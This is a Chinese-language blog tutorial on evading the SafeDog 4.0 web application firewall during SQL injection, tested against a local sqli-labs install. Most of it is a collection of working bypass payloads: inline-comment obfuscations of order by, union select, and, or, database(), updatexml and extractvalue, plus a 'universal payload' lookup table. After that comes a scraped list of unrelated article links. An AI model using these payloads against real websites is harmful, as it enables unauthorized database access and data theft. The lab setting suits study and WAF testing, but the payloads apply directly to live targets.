最近想着把过waf相关的整理一下,本次主要以安全狗4.0为例进行演示

准备工作

安全狗官网:
http://free.safedog.cn/install_desc_website.html
环境:Windows10+phpstudy+sqli-labs+安全狗v4.0

安装工作

1.下载安全狗

2.查看Apache服务是否存在

在这之前要先查看服务里有没有Apache,一般是用PHPstudy集成环境测试的话,是没有这个服务的,需要自己手动添加一下 ,cd到phpstudy的apache2/bin目录,cmd执行:

httpd.exe -k install -n apache2.4 #apache2.4就是你的服务名,可以自定义

安装之后,看到服务名就出现

3.安装网站安全狗

然后安装安全狗就只需要填写一个服务名(就是你刚刚设置的那个名字)以及选择Apache的版本

如何确定Apache的版本

httpd.exe -v

然后就好了

绕waf sql

1.判断注入点

一般都是先判断是数字型还是字符型(这里我就不过多描述),主要是试试如何绕and 1=1,因为and 1=1和and 1=2 的目的就是为了验证是否存在可能注入点,如果被过滤掉,就用逻辑语句测试(有时候1=1不行可以试-1=-1,-1=-2)

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%20-1=%27-1

页面正常

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%20-1=%27-2

页面错误

所以总结,一般大致就这几种

1' and -1='-1

-1'||-1='-1

-1'/*!14400or*/1=1%23

=替换成>、<、like、regexp同样可以绕过

2.order by绕过

1.利用%23%0a绕

1' order%23%0Aby --+

2.内联注释绕过

/*!order /*!/*/**/by*/3-- -

/*!order /*/*%/**/by*/3-- -

/*!order /*!/*/**//**/by*/3-- -

/*!order /*!/*/**//*/**/by*/3-- -
/*!order /*!/*/**/*/by/**/3--+

3.union select绕过

-1'/*!union/*!/*/**/*/select/**/1,2,3 -- -

4.系统函数绕过

单独的括号和函数名都不会检测,思路就是分开函数名和括号就行

5.函数名绕过

在报错注入的时候可以用这个格式绕过

/*!extractvalue/*!/*/**/*/
/*!updatexml/*!/*/**/*/

6.万能的payload

针对两个关键字连用或者函数

/*!union/*!/*/**/*/select/**/
/*!database/*!/*/**/*/()/**/
/*!order/*!/*/**/*/by/**/

针对单独的一个关键字

/*!union/*!/*/**/*/
/*!updatexml/*!/*/**/*/
/*!extractvalue/*!/*/**/*/

快速查询

=        /*!*/=/*!*/
order      /*!order/*!/*/**/*/
and       /*!and/*!/*/**/*/
or         /*!or/*!/*/**/*/
union       /*!union/*!/*/**/*/
select        /*!select/*!/*/**/*/
user()        /*!user/*!/*/**/*/()/**/
database()     /*!database/*!/*/**/*/()/**/
version()      /*!version/*!/*/**/*/()/**/
session_user()  /*!session_user/*!/*/**/*/()/**/
extractvalue     /*!extractvalue/*!/*/**/*/()/**/
updatexml    /*!updatexml/*!/*/**/*/

参考链接

https://xz.aliyun.com/t/7449

windows下过安全狗的更多相关文章

  1. iis7下iis安全狗不能用怎么办(安装iis6兼容性)

    is7下iis安全狗不能用怎么办 | 浏览:126 | 更新:2015-05-14 17:11 1 2 3 4 5 6 分步阅读 windows系统iis安全狗是常用的一款软件,针对网站使用很方便.在 ...

  2. Windows下安装Django及WEB服务启动

           如果使用的是 Linux 或 Mac OS X ,系统可能已经预装了 Python .在命令提示符下 (或 OS X 的终端中) 输入python ,如果出现python编辑环境,说明 ...

  3. Windows下安装Django【转】

      Windows下安装Django及WEB服务启动 如果使用的是 Linux 或 Mac OS X ,系统可能已经预装了 Python .在命令提示符下 (或 OS X 的终端中) 输入python ...

  4. windows下基于IIS配置ssl证书遇到的坑

    前几天配置windows下基于IIS配置ssl证书 完全按照步骤执行 绑定https网址后,一直显示:无法访问此网站 检查了443端口,还有防火墙限制,没发现什么 足足困扰了我好几天 后来突然想到前不 ...

  5. 在windows下安装gulp —— 基于 Gulp 的前端集成解决方案(一)

    相关连接导航 在windows下安装gulp —— 基于 Gulp 的前端集成解决方案(一) 执行 $Gulp 时发生了什么 —— 基于 Gulp 的前端集成解决方案(二) 常用 Gulp 插件汇总 ...

  6. 让 windows 下的命令行程序 cmd.exe 用起来更顺手

    在 Windows 下使用 Larave 框架做开发,从 Composer 到 artisan 总是避免不了和 cmd.exe 打交道,系统默认的命令行界面却是不怎么好看,且每行显示的字符数是做了限制 ...

  7. Windows下Visual studio 2013 编译 Audacity

    编译的Audacity版本为2.1.2,由于实在windows下编译,其源代码可以从Github上取得 git clone https://github.com/audacity/audacity. ...

  8. Windows下Nginx配置SSL实现Https访问(包含证书生成)

    Vincent.李   Windows下Nginx配置SSL实现Https访问(包含证书生成) Windows下Nginx配置SSL实现Https访问(包含证书生成) 首先要说明为什么要实现https ...

  9. 关于Linux和Windows下部署mysql.data.dll的注册问题

    mysql ado.net connector下载地址: http://dev.mysql.com/downloads/connector/net/ 选择版本: Generally Available ...

随机推荐

  1. HGAME2021 week3 pwn writeup

    一共放出五道题,都不是很难. blackgive 考栈转移,值得注意的一点是转移过去先填充几个ret,因为如果直接在转移过去的地方写rop链,执行起来会覆盖到上面的一些指针,导致程序不能正常输入和输出 ...

  2. nodejs+koa+uniapp实现微信小程序登陆获取用户手机号及openId

    nodejs+koa+uniapp实现微信小程序登陆获取用户手机号及openId 前言: 我准备用nodejs+koa+uniapp实现一款餐饮点单小程序,以及nodejs+koa+vue实现后端管理 ...

  3. CF1092B Teams Forming 题解

    Content 有 \(n\) 个学生,每个学生有一个能力值 \(a_i\).现在想把学生两两分成一组,但是不能让每个组里面的学生能力值不相同,因此可以通过刷题来提升自己的能力值,每次解出一道题,能力 ...

  4. Shell脚本--数值比较组合判断

    用于数值比较的无非大于.小于.等于.大于等于.小于等于这几个. 比较格式: [ 数值1 比较符 数值2 ]   注意左边的括号与数值1之间有一个空格,同样,数值2和右边的括号之间也有空格. 数值比较运 ...

  5. vue+uniapp实现美颜拍照录像,相册选择 | 录像限制时长,美颜拍照录像

    一.插件简介 Zhimi-BeautyCamera(智密 - 美颜相机图册插件)是一个支持美颜录像,美颜拍照,选择图视频功能,带录像参数时长限制的uniapp原生插件.平台支持:Android.IOS ...

  6. JAVA获取多个经纬度的中心点

    import java.util.LinkedList; public class Test1 { /** * 位置实体类,根据自己的来即可 */ static class Position{ /** ...

  7. Visual Studio之__cplusplus版本

    1. 默认值 Visual Studio(下文简称VS)中__cplusplus宏的默认值一直是: 199711L 可以用下面的代码查看 __cplusplus 的输出结果: #pragma once ...

  8. idea使用教程-模板的使用

    一.代码模板是什么 它的原理就是配置一些常用代码字母缩写,在输入简写时可以出现你预定义的固定模式的代码,使得开发效率大大提高,同时也可以增加个性化.最简单的例子就是在Java中输入sout会出现Sys ...

  9. 教你Python字符串的基本操作:拆分和连接

    摘要:由于字符串数据几乎无处不在,因此掌握有关字符串的交易工具非常重要.幸运的是,Python 使字符串操作变得非常简单,尤其是与其他语言甚至旧版本的 Python 相比时. 本文分享自华为云社区&l ...

  10. Spring事务的基本原理

    Spring事务的本质其实就是数据库对事务的支持,没有数据库的事务支持,spring是无法提供事务功能的.. 对于纯JDBC操作数据库,想要用到事务,可以按照以下步骤进行: 获取连接 Connecti ...